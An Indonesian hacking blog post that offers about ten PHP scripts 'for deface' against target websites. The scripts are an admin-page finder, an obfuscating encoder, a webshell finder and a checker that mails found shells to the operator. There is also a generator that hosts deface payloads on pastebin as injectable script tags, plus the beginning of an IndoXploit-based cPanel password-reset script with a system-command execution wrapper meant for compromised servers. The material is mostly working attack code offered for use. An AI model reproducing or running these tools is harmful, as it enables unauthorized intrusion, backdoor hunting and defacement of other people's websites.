10+ Script untuk Web Tools Online (Deface)

10+ Script untuk Web Tools Online (Deface)
Daftar Isi Artikel

Magelang1337.com - Script Lengkap Website Tools untuk Deface. Teknik hacking deface memang tidak terlalu berbahaya tetapi dapat menurunkan tingkat kepercayaan publik kepada website  dan bisa saja membuat malu pemilik website tersebut. 

Deface adalah suatu tindakan untuk memodifikasi halaman situs, termasuk penambahan penghapusan atau juga perubahan konten yang ada didalam website tersebut. Berbagai cara atau metode deface sendiri sudah banyak tersedia di internet. Dan beberapa dari admin magelang1337 juga telah menulis artikel tutorial deface. Kamu bisa membacanya pada label deface Klik 

Pada kesempatan kali ini kami akan berbagi Script Web Tools Online untuk keperluan deface. Kegunaan dari web tool itu sendiri untuk membantu memudahkan kamu saat melakukan proses recon di website target.

Source Code Online Tools

Script ini bisa kamu rubah lagi untuk tampilan desainnya supaya lebih terlihat keren. Cukup menyediakan hosting dan upload lalu jalankan toolsnya. Berikut kumpulan script web tools online yang bisa kamu pakai untuk pentest :

1. Bing Subdomain Scanner

Bing Subdomain Scanner : Memudahkan kamu menemukan subdomain dari website target. 
<?php
 
/*
Author : Magelang1337
Project : Bing Subdomain Scanner
Website : Https://magelang1337.com
 
*/
//No Max Execution Time
set_time_limit(0);
 
//Curl Function
function curlreq($domain)
{
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl, CURLOPT_URL, $domain);
    $result = curl_exec($curl);
 
    return $result;
}
 
//Url Cleaning
function cleanme($url)
{
    if(preg_match("/^(http(?:s)://)(www.)?([^/]+)/i",$url, $matches))
    {
        $host = $matches[3];
 
    }
    else
    {
    $url = $url;
    preg_match("/^(www.)?([^/]+)/i",$url, $matches);
    $host = $matches[2];
    }   
    return trim($host);
}
 
 
// Enter Domain Name http://google.com
$web = "yahoo.com";
 
$i = 1;
$subdomains = array();
while (true)
{   
 
    $website = curlreq("http://www.bing.com/search?q=domain%3a".$web."&first=".$i);
    $searchme  =    '#<cite>(.*?)</cite>#si';
    preg_match_all($searchme, $website, $matches);
    array_push($subdomains, $matches[1]);
    if($i == 1)
    {
        $i = 11;
    }
    else
    {
        $i = $i +12;
    }
    if(!preg_match('/Next/',$website)){break;}
}
 
 
//print_r($subdomains);
//get Unique Results
array_unique($subdomains);
sort($subdomains);
 
//Result
echo "<textarea rows="10" cols="50">";
    $countotal = 1;
foreach ($subdomains as $value)
{
    foreach ($value as $name)
    {
        echo cleanme($name)."n";
 
        $countotal++;
    }
}
echo "</textarea>
";
echo "Number of Subdomains : $countotal";
 
?>

2. Website IP Address Lookup

Website IP Address Lookup : Membantu kamu untuk memberikan data seperti informasi suatu domain tertentu yaitu kepemilikan domain, alamat, informasi kontak, nameserver, dan informasi lainnya.
<!DOCTYPE html>
<html lang="en">
<head>
<title>Website IP Address Lookup - PHP</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="Website IP Lookup">
<meta name="keywords" content="website ip lookup,ae"/>
<meta name="author" content="AE Developers">
<meta name="robots" content="all"/>
<style type="text/css">
	body{color:#666;text-align:center;font-family:arial;font-size:.8em;}
	body,td{font:16px/20px "Lucida Grande","Lucida Sans Unicode",Verdana,Arial,sans-serif}
	a{border-bottom:1px solid #ddd;color:#21759b;text-decoration:none}
	a:hover,a:focus{color:green;border-color:#d54e21}
	p,form{margin: 10px 0 0 0}
	ul,li{margin:0;padding:0}
	li{list-style: disc inside;padding-left:10px}
	#gmap_canvas{width:100%;height:30em;}
</style>
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
<link rel="stylesheet" type="text/css" href="aedev.css">
</head>

<body>
<br>

<?php
$ip = htmlentities($_GET["ip"]);
$hostname = gethostbyaddr($_GET['ip']);
$location = json_decode(file_get_contents('http://freegeoip.net/json/'.$ip));
$details = json_decode(file_get_contents("http://ipinfo.io/{$ip}/json"));
if(isset($_GET['ip']))
{
echo '
<div class="container">
    <div class="head">
     <h2>Website IP Lookup - PHP </h2>
     </div>
<form method="get" action="">
<input type="text" name="ip" id="ip" maxlength="25" placeholder="Website URL" title="ENTER WEBSITE URL HERE" />
<button id="submit" type="submit">
      Get IP Address
    </button>
';
echo " <h3>--------------------------------</h3>";
echo "<br><b>Website Information</b>";
echo "<br><b>IP: </b>" .$location->ip;
echo "<br><b>Country name: </b>" .$location->country_name;
echo "<br><b>Country code: </b>" .$location->country_code;
echo "<br><b>City: </b>" .$location->city;
echo "<br><b>State/Region: </b>" .$location->region_name;
echo "<br><b>Region code: </b>" .$location->region_code;
echo "<br><b>Zip code: </b>" .$location->zip_code;
echo "<br><b>Time zone: </b>" .$location->time_zone;
echo " <h3>--------------------------------</h3>";
echo " </form></div></b>";
echo <<<HTML
HTML;
}
else {
print ('
<div class="container">
    <div class="head">
     <h2>Website IP Lookup - PHP </h2>
     </div>
<form id="contact" method="get" action="">
<input type="text" name="ip" id="ip"  placeholder="Website URL" title="Enter Website URL Here" value="'.$IP.'" />
<button id="submit" type="submit">
      Get IP Address
    </button>
    </div>
</form>
</div>
');
}
?>

<?php
/* you can use this api too :)
$ip = htmlentities($_GET["ip"]);
$details = json_decode(file_get_contents("http://ipinfo.io/{$ip}/json"));
echo "IP: " .$details->ip;
echo "<br>Country: " .$details->country;
echo "<br>City: " .$details->city;
echo "<br>Region: " .$details->region;
echo "<br>Hostname: " .$details->hostname;
echo "<br>Organization: " .$details->org;
echo "<br>Location: " .$details->loc;
*/
?>
</body>
<footer><br><a href="https://magelang1337.com/">Developers</a></br></footer>
</html>

3. Admin Finder

Admin finder merupakan tools untuk memudahkan kamu mencari halaman login dari sebuah website.
<form method="POST" action="<?php $PHP_SELF; ?>">
<p align="center"><font color="lime">Site : </font>
<input type="text" name="url" placeholder="site.com"/>
<br>
<input type="submit" name="submit" value="Check"/>
</center>
</p>
<br>
<br>
<?php
function xss_protect($data, $strip_tags = false, $allowed_tags = "") { 
    if($strip_tags) {
  $data = strip_tags($data, $allowed_tags . "<b>");
    }

    if(stripos($data, "script") !== false) { 
  $result = str_replace("script","scr<b></b>ipt", htmlentities($data, ENT_QUOTES)); 
    } else { 
  $result = htmlentities($data, ENT_QUOTES); 
    } 

    return $result;
}
function urlExist($url)
{
    $handle = curl_init($url);
    if (false === $handle)
    {
    return false;
    }
    curl_setopt($handle, CURLOPT_HEADER, false);
    curl_setopt($handle, CURLOPT_FAILONERROR, true);
    curl_setopt($handle, CURLOPT_HTTPHEADER, Array("User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15") ); // request as if Firefox
    curl_setopt($handle, CURLOPT_NOBODY, true);
    curl_setopt($handle, CURLOPT_RETURNTRANSFER, false);
    $connectable = curl_exec($handle);
    curl_close($handle);
    return $connectable;
}
    if(isset($_POST['submit']) && isset($_POST['url']))
    {
  $url= htmlentities(xss_protect($_POST['url']));
  if(filter_var($url, FILTER_VALIDATE_URL))
  {
    $trying = array('admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/',
    'usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/',
    'panel-administracion/','instadmin/','memberadmin/','administratorlogin/','adm/','admin/account.php',
    'admin/index.php','admin/login.php','admin/admin.php','admin/account.php','admin_area/admin.php',
    'admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html',
    'admin/index.html','admin/login.html','admin/admin.html','admin_area/index.php','bb-admin/index.php','bb-admin/login.php',
    'bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html','admin/controlpanel.php','admin.php',
    'admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
    'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html',
    'panel-administracion/login.html','admin/cp.php','cp.php','administrator/index.php','administrator/login.php',
    'nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php','administrator/account.php',
    'administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php',
    'bb-admin/index.html','bb-admin/login.html','acceso.php','bb-admin/admin.html','admin/home.html',
    'login.php','modelsearch/login.php','moderator.php','moderator/login.php','moderator/admin.php','account.php',
    'pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
    'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php',
    'adminarea/index.html','adminarea/admin.html','webadmin.php','webadmin/index.php','webadmin/admin.php',
    'admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html',
    'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html',
    'login.html','modelsearch/login.html','moderator/login.html','adminarea/login.html','panel-administracion/index.html',
    'panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admincontrol/login.html',
    'adm/index.html','adm.html','moderator/admin.html','admin/login.php','account.html','controlpanel.html','admincontrol.html',
    'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php',
    'adminarea/index.php','adminarea/admin.php','adminarea/login.php','panel-administracion/index.php',
    'panel-administracion/admin.php','modelsearch/index.php','modelsearch/admin.php','admincontrol/login.php',
    'adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php','usuarios/login.php',
    'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php','admin.asp','admin/admin.asp',
    'admin_area/admin.asp','admin_area/login.asp','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp',
    'bb-admin/admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','user.asp','webadmin/index.asp',
    'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp',
    'adminLogin.asp','admin/adminLogin.asp','home.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp',
    'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp',
    'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2/login.asp','admin2/index.asp','adm/index.asp',
    'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp');
    foreach($trying as $sec)
    {
    $urll=$url.'/'.$sec;
    if(urlExist($urll))
    {
    echo '<p align="center"><font color="00FF00">'.$urll.' exists.<br> MATCH FOUND!!!</font></p>';
    exit;
    }
    else
    {
    echo '<p align="center"><font color="ffffff">'.$urll.' does not exist.</font></p>';
    }   
    }
    echo '<p align="center"><font color="c0c0c0" size="5">Could not find admin page.</font></p>';
  }
  else
  {
    echo '<p align="center"><font color="red" size="5">Invalid URL entered.</font></p>';    
  }
    }
    ?>

4. Encode & Decode

Encode & Decode adalah Sebuah Tools untuk membongkar dan menyembunyikan script.
<?php 
@ini_set('output_buffering',0); 
 @ini_set('display_errors', 0);
 $text = $_POST['code'];
 ?>
 <center>
 <h2>Encode And Decode</h2>
 <form method="post">
 <br>
 <textarea class='form-control con7' cols='60' rows='10' name="code"></textarea>
 <br><br>
 <select class='form-control con7' size="1" name="ope">
 <center>
 <option value="urlencode">url</option>
 <option value="base64">base64</option>
 <option value="ur">convert_uu</option>
 <option value="json">json</option>
 <option value="gzinflates">gzinflate - base64</option>
 <option value="str2">str_rot13 - base64</option>
 <option value="gzinflate">str_rot13 - gzinflate - base64</option>
 <option value="gzinflater">gzinflate - str_rot13 - base64</option>
 <option value="gzinflatex">gzinflate - str_rot13 - gzinflate - base64</option>
 <option value="gzinflatew">str_rot13-convert_uu-url-gzinflate-str_rot13-base64-convert_uu-gzinflate-url-str_rot13-gzinflate-base64</option>
 <option value="str">str_rot13 - gzinflate - str_rot13 - base64</option>
 <option value="url">base64 - gzinflate - str_rot13 - convert_uu - gzinflate - base64</option>
 </center>
 </select>
 &nbsp;<br><br><input class='kntd' type='submit' name='submit' value='Encode'>
 <input class='kntd' type='submit' name='submits' value='Decode'>
 </form>
 <br>
 <?php 
 $submit = $_POST['submit'];
 if (isset($submit)){
 $op = $_POST["ope"];
 switch ($op) {case 'base64': $codi=base64_encode($text);
 break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
 break;case 'json' : $codi=json_encode(utf8_encode($text));
 break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text)));
 break;case 'gzinflater' : $codi=base64_encode(str_rot13(gzdeflate($text)));
 break;case 'gzinflatex' : $codi=base64_encode(gzdeflate(str_rot13(gzdeflate($text))));
 break;case 'gzinflatew' : $codi=base64_encode(gzdeflate(str_rot13(rawurlencode(gzdeflate(convert_uuencode(base64_encode(str_rot13(gzdeflate(convert_uuencode(rawurldecode(str_rot13($text))))))))))));
 break;case 'gzinflates' : $codi=base64_encode(gzdeflate($text));
 break;case 'str2' : $codi=base64_encode(str_rot13($text));
 break;case 'urlencode' : $codi=rawurlencode($text);
 break;case 'ur' : $codi=convert_uuencode($text);
 break;case 'url' : $codi=base64_encode(gzdeflate(convert_uuencode(str_rot13(gzdeflate(base64_encode($text))))));
 break;default:break;}}
 
 $submit = $_POST['submits'];
 if (isset($submit)){
 $op = $_POST["ope"];
 switch ($op) {case 'base64': $codi=base64_decode($text);
 break;case 'str' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
 break;case 'json' : $codi=utf8_decode(json_decode($text));
 break;case 'gzinflate' : $codi=str_rot13(gzinflate(base64_decode($text)));
 break;case 'gzinflater' : $codi=gzinflate(str_rot13(base64_decode($text)));
 break;case 'gzinflatex' : $codi=gzinflate(str_rot13(gzinflate(base64_decode($text))));
 break;case 'gzinflatew' : $codi=str_rot13(rawurldecode(convert_uudecode(gzinflate(str_rot13(base64_decode(convert_uudecode(gzinflate(rawurldecode(str_rot13(gzinflate(base64_decode($text))))))))))));
 break;case 'gzinflates' : $codi=gzinflate(base64_decode($text));
 break;case 'str2' : $codi=str_rot13(base64_decode($text));
 break;case 'urlencode' : $codi=rawurldecode($text);
 break;case 'ur' : $codi=convert_uudecode($text);
 break;case 'url' : $codi=base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode(($text)))))));
 break;default:break;}}
 $html = htmlentities(stripslashes($codi));
 echo "<form><textarea cols=60 rows=10 class='form-control con7' >".$html."</textarea></center></form><br/><br/>";

?>

5. Hash Generator

Sebuah Tools untuk membuat kata seperti passwrod dari string data. 

<?php 
$submit = $_POST['enter'];
 if (isset($submit)) {
 $pass = $_POST['password']; // password
 $salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; // random string
 $hash = md5($pass); // md5 hash #1
 $md4 = hash("md4", $pass);
 $hash_md5 = md5($salt . $pass); // md5 hash with salt #2
 $hash_md5_double = md5(sha1($salt . $pass)); // md5 hash with salt & sha1 #3
 $hash1 = sha1($pass); // sha1 hash #4
 $sha256 = hash("sha256", $text);
 $hash1_sha1 = sha1($salt . $pass); // sha1 hash with salt #5
 $hash1_sha1_double = sha1(md5($salt . $pass)); // sha1 hash with salt & md5 #6
 }
 echo '<form action="" method="post">';
 echo '<center><h2>Hash Generator</h2>';
 echo '<table>';
 echo 'Masukkan teks yang ingin di encrypt: ';
 echo '<input class="inputz" type="text" name="password" size="40">';
 echo '<input class="inputzbut" type="submit" name="enter" value="Hash!">';
 echo '<br>';
 echo 'Original Password: <input class=inputz type=text size=50 value='.$pass.'><br><br>';
 echo 'MD5: <input class=inputz type=text size=50 value='.$hash.'><br><br>';
 echo 'MD4: <input class=inputz type=text size=50 value='.$md4 .'><br><br>';
 echo 'MD5 with Salt: <input class=inputz type=text size=50 value='.$hash_md5.'><br><br>';
 echo 'MD5 with Salt & Sha1: <input class=inputz type=text size=50 value='.$hash_md5_double.'><br><br>';
 echo 'Sha1: <input class=inputz type=text size=50 value='.$hash1 .'><br><br>';
 echo 'Sha256: <input class=inputz type=text size=50 value='.$sha256.'><br><br>';
 echo 'Sha1 with Salt: <input class=inputz type=text size=50 value='.$hash1_sha1.'><br><br>';
 echo 'Sha1 with Salt & MD5: <input class=inputz type=text size=50 value='.$hash1_sha1_double.'></center></table>';
  ?>

6. Hash identifier 

 Hash identifier : Alat Untuk Mengidentifikasi Jenis Hash pada Teks yang sudah Terenkripsi.
<?php 
if (isset($_POST['gethash'])) {
	$hash = $_POST['hash'];
	if (strlen($hash) == 32) {
	$hashresult = "MD5 Hash";
	} elseif (strlen($hash) == 40) {
	$hashresult = "SHA-1 Hash/ /MySQL5 Hash";
	} elseif (strlen($hash) == 13) {
	$hashresult = "DES(Unix) Hash";
	} elseif (strlen($hash) == 16) {
	$hashresult = "MySQL Hash / /DES(Oracle Hash)";
	} elseif (strlen($hash) == 41) {
	$GetHashChar = substr($hash, 40);
	if ($GetHashChar == "*") {
	$hashresult = "MySQL5 Hash";
	}
	} elseif (strlen($hash) == 64) {
	$hashresult = "SHA-256 Hash";
	} elseif (strlen($hash) == 96) {
	$hashresult = "SHA-384 Hash";
	} elseif (strlen($hash) == 128) {
	$hashresult = "SHA-512 Hash";
	} elseif (strlen($hash) == 34) {
	if (strstr($hash, '$1$')) {
	$hashresult = "MD5(Unix) Hash";
	}
	} elseif (strlen($hash) == 37) {
	if (strstr($hash, '$apr1$')) {
	$hashresult = "MD5(APR) Hash";
	}
	} elseif (strlen($hash) == 34) {
	if (strstr($hash, '$H$')) {
	$hashresult = "MD5(phpBB3) Hash";
	}
	} elseif (strlen($hash) == 34) {
	if (strstr($hash, '$P$')) {
	$hashresult = "MD5(WordPress) Hash";
	}
	} elseif (strlen($hash) == 39) {
	if (strstr($hash, '$5$')) {
	$hashresult = "SHA-256(Unix) Hash";
	}
	} elseif (strlen($hash) == 39) {
	if (strstr($hash, '$6$')) {
	$hashresult = "SHA-512(Unix) Hash";
	}
	} elseif (strlen($hash) == 24) {
	if (strstr($hash, '==')) {
	$hashresult = "MD5(Base-64) Hash";
	}
	} else {
	$hashresult = "Hash type not found";
	}
	} else {
	$hashresult = "Not Hash Entered";
	}
	?>
	<center><br><Br><br>
	
	<form action="" method="POST">
	<tr>
	<table >
	<th colspan="5">Hash Identification</th>
	<tr class="optionstr"><B><td>Enter Hash</td></b><td>:</td>	<td><input type="text" name="hash" size='60' class="inputz" /></td><td><input type="submit" class="inputzbut" name="gethash" value="Identify Hash" /></td></tr>
	<tr class="optionstr"><b><td>Result</td><td>:</td><td><?php echo $hashresult; ?></td></tr></b>
	</table></tr></form>
	</center>

7. Shell Cheker

Shell Cheker adalah sebuah tools yang bisa dipakai untuk Cek Akses Shell yang masih ada pada suatu situs web 

 <?php
echo '<center>
<form name="frmcontadd" action="" method="post"><textarea placeholder="source.helixs.tech/shell.php" name="url" cols=115 rows=10></textarea><br><br><input class="subbtn" type="submit" name="Submit" value="Yamete Kudasai"></form>';
?>
<?php
function get_http_response_code($theurl) {
    $headers = get_headers($theurl);
    $status = substr($headers[0], 9, 3);
    $p = parse_url($theurl);
    $host = explode(':', $p['host']);
    $hostname = $host[0];
    if ($status == 200) {
       $visitor = $_SERVER["REMOTE_ADDRS"];
        $judul = "shell: $theurl ";
        $body = "shell: $theurl";
        if (!empty($theurl)) {
            @mail("emailmu@gmail.com", $judul, $body);
        }
        $writeuRl = $theurl . "
";
        $fh = fopen("hasil.txt", "a");
        fwrite($fh, $writeuRl, strlen($writeuRl));
        echo '<strong><font color=Green>Found</font></strong> - <a href="" . $theurl . "" target=_blank>' . $theurl . '</a><br />';
    } elseif ($status == 500) {
        echo '<strong><font color=black>" . $status . " 500 Internal Server Error !</font></strong> - <a href="" . $theurl . "" target=_blank>" . $theurl . "</a><br />';
    } else {
        $writeuRl = $theurl . "
";
        $fh = fopen("sampah.txt", "a");
        fwrite($fh, $writeuRl, strlen($writeuRl));
        echo '<strong><font color=red>Not Found</font></strong> - <a href="" . $theurl . "" target=_blank>" . $theurl . "</a><br />';
    }
}
if (isset($_POST['Submit'])) {
    $hosts = explode("
", $_POST['url']);
   
    $values = array();
    foreach ($hosts as $host) {
        if ($host != "") {
            @get_http_response_code("$host");
        }
    }
    echo '<br /><strong>Selesai</strong>';
}
	?>

8. Shell Finder

Shell Finder adalah sebuah tools untuk mencari secara otomatis pada website target. Dengan tools ini kamu bisa menemukan backdoor yang tertanam seperti shell b374k, andella, indoxploit, 1n73ction dan lainnya.

<?php 
echo '<center><h2>Shell Finder</h2>
	<form action="" method="post">
	<input type="text" size="50" name="traget" value="https://source.helixs.tech/"/>
	<br><br>
	<input name="scan" value="Cari"  style="width: 215px;" class="kotak" type="submit">
	</form><br>';
	if (isset($_POST["scan"])) {
	$url = $_POST['traget'];
	echo "<br /><span class='start'>Scanning " . $url . "<br /><br /></span>";
	echo "Result :<br />";
	$shells = array("WSO.php", "alfashell.php", "alfa.php", "shell.php", "mini.php", "mini.phtml", "minishell.phtml", "dz.php", "xxx.php", "x.php", "heker.php", "indosec.php", "sec.php", "0x.php", "memek.php", "sym.php", "sym403.php", "tolol.php", "x.php", "r99.php", "lol.php", "jo.php", "nikung.php", "whmcs.php", "shellz.php", "d0main.php", "d0mains.php", "users.php", "Cgishell.php", "killer.php", "changeall.php", "2.php", "Sh3ll.php", "dz0.php", "dam.php", "user.php", "dom.php", "whmcs.php", "vb.zip", "evil.php", "eviltwin.php", "zx.php", "kntl.php", "kuntul.php", "r00t.php", "c99.php", "gaza.php", "1.php", "wp.zip","d00.php","admins.php", "admins.php", "wp.zip", "wso2.5.1", "pasir.php", "pasir2.php", "up.php", "cok.php", "newfile.php", "upl.php", ".php", "a.php", "crot.php", "kontol.php", "hmei7.php", "jembut.php", "memek.php", "tai.php", "rabit.php", "indoxploit.php", "a.php", "hemb.php", "hack.php", "galau.php", "HsH.php", "indoXploit.php", "asu.php", "wso.php", "lol.php", "berandal.php", "rabbit.php", "1n73ction.php", "k.php", "mailer.php", "mail.php", "temp.php", "c.php", "d.php", "IDB.php", "indo.php", "indonesia.php", "semvak.php", "ndasmu.php", "berandal.php", "as.php", "ad.php", "aa.php", "file.php", "peju.php", "sad.php", "sadboy.php", "wsa.php", "z.php", "min.php", "alf4.php", "priv.php", " priv8.php", "boyshell.php", "evil.php", "api.php", "evilshell.php", "uploader.php");
	foreach ($shells as $shell) {
	$headers = get_headers("$url$shell"); //
	if (eregi('200', $headers[0])) {
	echo "<a href='$url$shell'>$url$shell</a> <span class='found'>Selese Cok!</span><br /><br/><br/>"; //
	$dz = fopen('shells.txt', 'a+');
	$suck = "$url$shell";
	fwrite($dz, $suck . "
	");
	}
	}
	echo "Shell [ <a href='./shells.txt' target='_blank'>shells.txt</a> ]</span>";
	}
	?>
Kamu bisa menambahkan kata setelah code $shells = array( dan diakhiri dengan .php 

9. JSO Auto Generator

Dengan tools ini kamu bisa mengkonvert script deface dengan mudah. Jangan lupa untuk Membuat API Developer Key

<?php 
echo '
  <center>
<table class="table table-bordered table-striped">
    <thead>
  	<script>
    function runCharCodeAt() {
        input = document.charCodeAt.input.value;
        output = "";
        for(i=0; i<input.length; ++i) {
            if (output != "") output += ", ";
            output += input.charCodeAt(i);
        }
        document.charCodeAt.output.value = output;
    }
</script>
</head>
<body>
<center>
    <form name="charCodeAt" method="post">
        <textarea name="input" class="form-control text-danger" autocomplete="off" style="width:250px; height:150px;"placeholder="Text"></textarea><br><br>
        <input type="button" class="btn btn-outline-warning" onclick="runCharCodeAt()" value="Convert Now!"><br><br>
        <textarea name="output" class="form-control text-danger" style="width:250px; height:150px;" readonly placeholder="Output"></textarea><br><br>
        <input type="submit" class="btn btn-outline-warning" name="submit" value="Submit">
    </form>
    <br><br>
</table></div>';
if (isset($_POST['submit'])) {
    if (empty($_POST['output'])) {
        echo "<script>alert('Convert First');</script>";
    } else {
$isi = $_POST['output'];
$random = rand(1, 99999999);
$api_dev_key            = '425442656787987623134'; // your api_developer_key
$api_paste_code         = "document.documentElement.innerHTML=String.fromCharCode(".$isi.")"; // your paste text
$api_paste_private      = '0'; // 0=public 1=unlisted 2=private
$api_paste_name         = $random; // name or title of your paste
$api_paste_expire_date      = 'N';
$api_paste_format       = 'text';
$api_user_key           = ''; // if an invalid or expired api_user_key is used, an error will spawn. If no api_user_key is used, a guest paste will be created
$api_paste_name         = urlencode($api_paste_name);
$api_paste_code         = urlencode($api_paste_code);
 
$url                = 'https://pastebin.com/api/api_post.php';
$ch                 = curl_init($url);
 
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'api_option=paste&api_user_key='.$api_user_key.'&api_paste_private='.$api_paste_private.'&api_paste_name='.$api_paste_name.'&api_paste_expire_date='.$api_paste_expire_date.'&api_paste_format='.$api_paste_format.'&api_dev_key='.$api_dev_key.'&api_paste_code='.$api_paste_code.'');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_VERBOSE, 1);
curl_setopt($ch, CURLOPT_NOBODY, 0);
 
$response           = curl_exec($ch);
$hasil = str_replace('https://pastebin.com', 'https://pastebin.com/raw', $response);
$asu = '<script type="text/javascript" src="'.$hasil.'"></script>';
$kk = htmlspecialchars($asu);
echo "<br><center><textarea class='form-control text-danger' readonly style='width:250px; height:100px;'>". $kk ."</textarea></center>";
}
}
?>
10. Cpanel Reset Password

Sebelumnya kami juga sudah membuat cara hack cpanel tanpa crack. Kamu bisa membacanya disini

  <?php
  //thanks to : IndoXploit (Magelang1337.com)
  session_start();
  @error_reporting(0);
  @set_time_limit(0);
  if(version_compare(PHP_VERSION, '5.3.0', '<')) {
  	@set_magic_quotes_runtime(0);
  }
  @clearstatcache();
  @ini_set('error_log',NULL);
  @ini_set('log_errors',0);
  @ini_set('max_execution_time',0);
  @ini_set('output_buffering',0);
  @ini_set('display_errors', 0);
  $SERVERIP  = (!$_SERVER['SERVER_ADDR']) ? gethostbyname($_SERVER['HTTP_HOST']) : $_SERVER['SERVER_ADDR'];

  function background() {
    echo '<body bgcolor=black>';
  }
  function color($bold = 1, $colorid = null, $string = null) {
  		$color = array(
  			"</font>",  			# 0 off
  			"<font color='red'>",	# 1 red
  			"<font color='lime'>",	# 2 lime
  			"<font color='lime'>",	# 3 white
  			"<font color='gold'>",	# 4 gold
  		);
  	return ($string !== null) ? $color[$colorid].$string.$color[0]: $color[$colorid];
  }
  function hddsize($size) {
  	if($size >= 1073741824)
  		return sprintf('%1.2f',$size / 1073741824 ).' GB';
  	elseif($size >= 1048576)
  		return sprintf('%1.2f',$size / 1048576 ) .' MB';
  	elseif($size >= 1024)
  		return sprintf('%1.2f',$size / 1024 ) .' KB';
  	else
  		return $size .' B';
  }
  function hdd() {
  	$hdd['size'] = hddsize(disk_total_space("/"));
  	$hdd['free'] = hddsize(disk_free_space("/"));
  	$hdd['used'] = $hdd['size'] - $hdd['free'];
  	return (object) $hdd;
  }
  function usergroup() {
  	if(!function_exists('posix_getegid')) {
  		$user['name'] 	= @get_current_user();
  		$user['uid']  	= @getmyuid();
  		$user['gid']  	= @getmygid();
  		$user['group']	= "?";
  	} else {
  		$user['uid'] 	= @posix_getpwuid(posix_geteuid());
  		$user['gid'] 	= @posix_getgrgid(posix_getegid());
  		$user['name'] 	= $user['uid']['name'];
  		$user['uid'] 	= $user['uid']['uid'];
  		$user['group'] 	= $user['gid']['name'];
  		$user['gid'] 	= $user['gid']['gid'];
  	}
  	return (object) $user;
  }
  function lib_installed() {
  	$lib[] = "MySQL: ".(function_exists('mysql_connect') ? color(1, 2, "ON") : color(1, 1, "OFF"));
  	$lib[] = "cURL: ".(function_exists('curl_version') ? color(1, 2, "ON") : color(1, 1, "OFF"));
  	$lib[] = "WGET: ".(exe('wget --help') ? color(1, 2, "ON") : color(1, 1, "OFF"));
  	$lib[] = "Perl: ".(exe('perl --help') ? color(1, 2, "ON") : color(1, 1, "OFF"));
  	$lib[] = "Python: ".(exe('python --help') ? color(1, 2, "ON") : color(1, 1, "OFF"));
  	return implode(" | ", $lib);
  }
  function exe($cmd) {
  	if(function_exists('system')) {
  		@ob_start();
  		@system($cmd);
  		$buff = @ob_get_contents();
  		@ob_end_clean();
  		return $buff;
  	} elseif(function_exists('exec')) {
  		@exec($cmd,$results);
  		$buff = "";
  		foreach($results as $result) {
  			$buff .= $result;
  		} return $buff;
  	} elseif(function_exists('passthru')) {
  		@ob_start();
  		@passthru($cmd);
  		$buff = @ob_get_contents();
  		@ob_end_clean();
  		return $buff;
  	} elseif(function_exists('shell_exec')) {
  		$buff = @shell_exec($cmd);
  		return $buff;
  	}
  }

  function infosistem() {
    $disable_functions = @ini_get('disable_functions');
  	$disable_functions = (!empty($disable_functions)) ? color(1, 1, $disable_functions) : color(1, 2, "NONE");
    $output[] = "<body bgcolor=gray><center> <font size=5 color=lime>[X] Reset Password Cpanel [X]</font> </center> <br>";
    $output[] = "<hr color='lime'> Domain : " .color(1, 2,$_SERVER[HTTP_HOST]) . " | Cpanel Login : <font color=lime>http://" . $_SERVER[HTTP_HOST] . "/cpanel </font>" . "<hr color='lime'>";
    $output[] = "PHP VERSION : " .color(1, 2,phpversion());
    $output[] = "HDD         : ".color(1, 2, hdd()->used)." / ".color(1, 2 , hdd()->size)." (Free: ".color(1, 2 , hdd()->free).")";
    $output[] = "SYSTEM      : ".color(1, 2, php_uname());
